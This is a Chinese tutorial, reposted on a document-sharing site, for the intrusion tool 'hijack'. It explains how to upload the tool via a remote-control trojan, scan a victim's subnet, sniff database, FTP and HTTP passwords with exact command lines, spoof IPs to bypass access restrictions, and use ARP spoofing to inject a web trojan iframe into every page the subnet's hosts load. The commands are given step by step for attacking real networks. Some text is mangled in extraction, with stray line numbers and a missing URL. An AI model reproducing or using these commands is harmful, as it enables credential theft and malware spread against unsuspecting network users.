带ARP欺骗攻击的渗透利刃--hijack.docx

上传人：牧羊曲112

文档编号：1668383

上传时间：2022-12-13

格式：DOCX

页数：8

大小：836.47KB

《带ARP欺骗攻击的渗透利刃--hijack.docx》由会员分享，可在线阅读，更多相关《带ARP欺骗攻击的渗透利刃--hijack.docx（8页珍藏版）》请在三一办公上搜索。

1、前面介绍过一些入侵渗透用的小工具，如AIO和MT等，这些小工具的功能都非常强大，可以实现各种渗透入侵控制功能。但同时这些工具也有不足之处，即不具备ARP欺骗攻击的功能。 ARP欺骗攻击在内网渗透中的作用是极大的，因此这里介绍一个具有ARP欺骗功能的渗透小工具hijack。这个小巧但功能强大的工具，具备各种强大的功能，可以进行远程渗透入侵。1上传hijack，安装嗅探组件hijack解压后，里面有3个文件：hijack.exe、winpcap.exe和old.exe。其中hijack.exe和winpcap.exe是必需的。前者是程序主文件，后者是嗅探所需Winpcap数据包的自解压版本。首先，

2、攻击者要将hijack上传到远程主机上，可以使用远程控制木马或溢出Shell窗口进行上传，如图8-67所示。这里选择上传到C盘根目录下。返回到远程命令控制窗口中，执行命令：1 dir c:hijack.exe 如果显示文件，则表示上传文件成功。然后执行c:winpcap.exe命令，会自动解压所需的嗅探组件到系统目录下，如图8-68所示。在使用hijack.exe工具进行渗透入侵前，必须安装winpcap组件，否则会弹出错误提示，如图8-69所示。2查获远程网络信息入侵控制的主机，可能是单独的一台主机，也可能位于某个网络中；主机上可能只安装了一块网卡，也可能安装了多块网块-全面地了解远程主机上

3、的网络信息是进一步渗透入侵攻击前所必需的。在远程控制木马的命令控制窗口中，执行命令：2 hijack /L 可以看到远程主机上网卡的设备名、IP地址、MAC物理地址和子网掩码等各种网络信息，如图8-70所示。其中，比较重要的是idx列显示的信息，也就是网卡索引号。如果是单网卡，那么网卡索引号为1。现在要扫描远程主机子网中所有的主机IP地址，命令格式为：3 hijack exe -d 网卡索引号 /s由于是单网卡，可以直接执行命令：4 hijack -d 1 /s 可以从远程主机所在的子网中扫描并显示所有主机的IP地址，以及其网卡的MAC物理地址。这里可以看到，在子网中有3台主机，如图8-71所

4、示。3嗅探子网主机的密码在进行渗透入侵时，嗅探具有非常重要的作用，尤其是在入侵网站服务器网络时。利用嗅探，可以获得子网中其他主机的管理员密码，或者是网站登录密码、邮箱或FTP登录密码等。1）嗅探数据库的密码例如，控制网站服务器主机内网的IP地址是192.168.1.8，在子网中另一台主机的IP地址是192.168.1.10，该主机是网站的数据库服务器。攻击者想获得数据库的连接密码，可以嗅探主机192.168.1.6的所有网络连接数据。在远程控制木马的命令控制窗口中，执行嗅探命令（见图8-72）5 hijack -d 1 -O pass.log 192.168.1.* 6 192.168.1.1

5、0 该命令可以嗅探所有192.168.1.*网段的主机与数据库服务器192.168.1.6之间的网络信息数据，并从中捕获密码，保存在pass.log文件中。也可以直接使用如下命令：7 hijack -d 1 -O pass.log 192.168.1.* 192.168.1.1嗅探所有主机与网关服务器之间的数据交换，从而获得其登录密码并直接从外网登录网关。以上命令，只是进行单向嗅探，我们也可以添加参数-f进行双向嗅探，命令格式如下：8 hijack -d 1 -f -O pass.log 192.168.1.* 192.168.1.10 另外，我们也可以设置嗅探指定协议的密码，如嗅探FTP密码

6、，可执行命令：9 hijack -d 1 -r -f -O pass.log 192.168.1.* 192.168.1.10 USER|PASS tcp and dst port 21要嗅探常见的HTTP密码，可执行命令：10 hijack -d 1 -r -f -O pass.log 192.168.1.* 192.168.1.10 username=|password= tcp and dst port 80 2）查看嗅探数据执行了后台嗅探后，嗅探的结果会保存在远程主机上。显示嗅探结果的命令为：10 hijack.exe -I pass.log 执行命令后，就可以看到嗅探记录文件中保存的

7、所有嗅探数据了，如图8-73所示，通过分析查看即可获得密码。3）IP地址欺骗攻击，突破内网连接限制通过前面嗅探到的密码可以进行远程连接，以控制子网中的其他主机。但是这些子网中的主机，往往通过防火墙或其他方式设置了连接限制，只允许与指定IP地址的主机进行连接，此时可以通过hijack的IP地址欺骗功能来渗透入侵连接受限制的主机。这里假设在子网内某台计算机公网的IP地址为202.98.198.33，该主机设置了IP地址限制，只允许IP地址202.98.198.77访问，而攻击者本机的IP地址是202.172.68.12，如果想入侵这台连接受制限的主机，可以执行命令（见图8-74）：11 hijac

8、k -d 1 -z 202.98.198.33 202.98.198.1 202.172.68.12 202.98.198.77其中，202.98.198.1是该网段的网关IP。执行该命令后，攻击者就可以突破IP地址限制，连接上原本受限制的主机了。4）ARP欺骗攻击在渗透入侵攻击中，如果无法进行嗅探，或者难以突破内网与外网，那么ARP欺骗攻击就可以大显身手了。hijack的ARP欺骗攻击可以在子网内其他主机与网关的数据交换中，任意添加修改网络数据，以达到挂马攻击的目的。例如，已经有了一个网页木马，地址为（1）编写规则文件。打开记事本，编写如下内容的文本文件：12 - 13 HTML 14 -

9、15 iframeHTML 将文件保存为job.txt，然后上传到远程主机与hijack所在的文件夹下，该文件作为ARP欺骗规则文件。（2）实施ARP欺骗攻击。在远程命令控制窗口中，执行如下命令（见图8-75）：16 hijack -d 1 -v -p 80 -S 100 -F job.txt 17 192.168.1.1 192.168.1.* 命令执行后即可对子网内的所有主机进行ARP欺骗攻击了。当子网中的所有主机访问任意网页时，能够正常打开网页。但是，网页中会被嵌入网页木马，从而被木马攻击。除了上面的攻击实例外，hijack还可以进行HTTP会话捕获、DNS欺骗、网速限制和跨网段欺骗等强大的渗透攻击功能，我们可以直接执行hijack -h命令来查看其详细的命令帮助信息